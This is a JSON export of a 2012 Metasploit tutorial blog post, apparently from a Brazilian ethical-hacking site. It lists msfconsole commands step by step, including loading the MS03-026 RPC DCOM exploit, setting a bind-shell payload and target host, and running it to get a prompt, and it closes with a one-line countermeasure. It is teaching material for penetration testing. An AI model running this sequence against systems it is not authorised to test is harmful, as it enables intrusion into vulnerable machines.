{"id":2958,"date":"2012-05-18T18:29:29","date_gmt":"2012-05-18T18:29:29","guid":{"rendered":"http:\/\/www.ethicalhacker.com.br\/site\/?p=2958"},"modified":"2019-06-06T16:50:29","modified_gmt":"2019-06-06T19:50:29","slug":"metasploit-basico-2","status":"publish","type":"post","link":"https:\/\/www.ethicalhacker.com.br\/site\/2012\/05\/exploits\/metasploit-basico-2\/","title":{"rendered":"Metasploit Basics"},"content":{"rendered":"<p>Below are some basic commands for Metasploit, the powerful framework for vulnerability testing.<\/p>\n<p>Accessing the framework:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m13.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2924\" title=\"m1\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m13.png\"  alt=\"\" width=\"536\" height=\"46\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m13.png 766w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m13-300x25.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m13-150x12.png 150w\" sizes=\"auto, (max-width: 536px) 100vw, 536px\" \/><\/a><\/p>\n<p>Running &#8220;.\/msfconsole&#8221;:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m2.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2922\" title=\"m2\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m2.png\"  alt=\"\" width=\"540\" height=\"186\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m2.png 771w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m2-300x103.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m2-150x51.png 150w\" sizes=\"auto, (max-width: 540px) 100vw, 540px\" 
\/><\/a><\/p>\n<p>Getting help with the &#8220;help&#8221; command:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m3.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2926\" title=\"m3\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m3.png\"  alt=\"\" width=\"547\" height=\"200\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m3.png 781w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m3-300x109.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m3-150x54.png 150w\" sizes=\"auto, (max-width: 547px) 100vw, 547px\" \/><\/a><\/p>\n<p>Listing the exploits available in the database with the &#8220;show exploits&#8221; command:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/x.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-full wp-image-3985\" title=\"x\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/x.png\"  alt=\"\" width=\"547\" height=\"200\" \/><\/a><\/p>\n<p>Using the &#8220;search&#8221; command to look for a specific exploit:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m5.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2931\" title=\"m5\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m5.png\"  alt=\"\" width=\"549\" height=\"141\" 
srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m5.png 784w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m5-300x76.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m5-150x38.png 150w\" sizes=\"auto, (max-width: 549px) 100vw, 549px\" \/><\/a><\/p>\n<p>Getting information about the exploit with the &#8220;info&#8221; command:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m6.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2933\" title=\"m6\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m6.png\"  alt=\"\" width=\"545\" height=\"324\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m6.png 778w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m6-300x178.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m6-150x89.png 150w\" sizes=\"auto, (max-width: 545px) 100vw, 545px\" \/><\/a><\/p>\n<p>Exploiting a machine vulnerable to RPC DCOM with the command &#8220;use windows\/dcerpc\/ms03_026_dcom&#8221;:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m7.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2936\" title=\"m7\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m7.png\"  alt=\"\" width=\"547\" height=\"55\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m7.png 782w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m7-300x30.png 300w, 
https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m7-150x15.png 150w\" sizes=\"auto, (max-width: 547px) 100vw, 547px\" \/><\/a><\/p>\n<p>Checking which targets are vulnerable with the &#8220;show targets&#8221; command:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m81.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2939\" title=\"m8\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m81.png\"  alt=\"\" width=\"548\" height=\"118\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m81.png 783w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m81-300x64.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m81-150x32.png 150w\" sizes=\"auto, (max-width: 548px) 100vw, 548px\" \/><\/a><\/p>\n<p>Checking the payloads available for the attack with the &#8220;show payloads&#8221; command:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m9.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2941\" title=\"m9\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m9.png\"  alt=\"\" width=\"550\" height=\"216\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m9.png 786w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m9-300x117.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m9-150x58.png 150w\" sizes=\"auto, (max-width: 550px) 100vw, 550px\" \/><\/a><\/p>\n<p>Setting a payload for the attack with the command &#8220;set payload 
generic\/shell_bind_tcp&#8221;:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m10.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2943\" title=\"m10\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m10.png\"  alt=\"\" width=\"548\" height=\"44\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m10.png 783w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m10-300x24.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m10-150x12.png 150w\" sizes=\"auto, (max-width: 548px) 100vw, 548px\" \/><\/a><\/p>\n<p>Checking the usage options with the &#8220;show options&#8221; command:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m111.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2945\" title=\"m11\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m111.png\"  alt=\"\" width=\"545\" height=\"251\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m111.png 779w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m111-300x138.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m111-150x69.png 150w\" sizes=\"auto, (max-width: 545px) 100vw, 545px\" \/><\/a><\/p>\n<p>Setting the target with the command &#8220;set RHOST ip_do_alvo&#8221;, where ip_do_alvo is the target's IP address:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m121.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2946\" title=\"m12\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m121.png\"  alt=\"\" 
width=\"543\" height=\"39\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m121.png 776w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m121-300x21.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m121-150x10.png 150w\" sizes=\"auto, (max-width: 543px) 100vw, 543px\" \/><\/a><\/p>\n<p>Running the exploit and getting a prompt with the &#8220;exploit&#8221; command:<\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m131.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-2947\" title=\"m13\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m131.png\"  alt=\"\" width=\"545\" height=\"145\" srcset=\"https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m131.png 779w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m131-300x79.png 300w, https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/m131-150x39.png 150w\" sizes=\"auto, (max-width: 545px) 100vw, 545px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tuxme.png\" class=\"gallery_colorbox\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-full wp-image-3476\" title=\"tuxme\" src=\"http:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/tuxme.png\"  alt=\"\" width=\"108\" height=\"92\" \/><\/a><\/p>\n<p><span style=\"color: #ff0000;\"><strong>Countermeasures<\/strong><\/span>: Update the operating system.<\/p>\n<p>Until next time!<\/p>\n\r\n\t\t<div class='author-shortcodes'>\r\n\t\t\t<div class='author-inner'>\r\n\t\t\t\t<div class='author-image'>\r\n\t\t\t<img 
src='https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/186048_100001838322519_1550894_n-11668_57x57.jpg' alt='' \/>\r\n\t\t\t<div class='author-overlay'><\/div>\r\n\t\t<\/div> <!-- .author-image --> \r\n\t\t<div class='author-info'>\r\n\t\t\t<p>Author:\u00a0<strong>S\u00edlvio C\u00e9sar Roxo Giavaroto<\/strong><\/p>\n<p>He holds an MBA specializing in Information Security Management and a technologist degree in Computer Networks, is a C|EH Certified Ethical Hacker, works as a pentester and security analyst for Linux servers at the S\u00e3o Paulo State Government, and is a university professor and a C|EH and C|HFI instructor.<\/p>\n<p><em>\u00a0<\/em>\r\n\t\t<\/div> <!-- .author-info --><\/p>\r\n\t\t\t<\/div> <!-- .author-inner -->\r\n\t\t<\/div> <!-- .author-shortcodes -->\n","protected":false},"excerpt":{"rendered":"<p>Below are some basic commands for Metasploit, the powerful framework for vulnerability testing. Accessing the framework: Running &#8220;.\/msfconsole&#8221;: Getting help with the &#8220;help&#8221; command: Listing the exploits available in the database with the command &#8220;show 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":3315,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21,101],"tags":[],"class_list":["post-2958","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-exploits","category-tutorial-backtrack"],"_links":{"self":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/2958","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/comments?post=2958"}],"version-history":[{"count":18,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/2958\/revisions"}],"predecessor-version":[{"id":10220,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/2958\/revisions\/10220"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media\/3315"}],"wp:attachment":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media?parent=2958"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/categories?post=2958"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/tags?post=2958"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}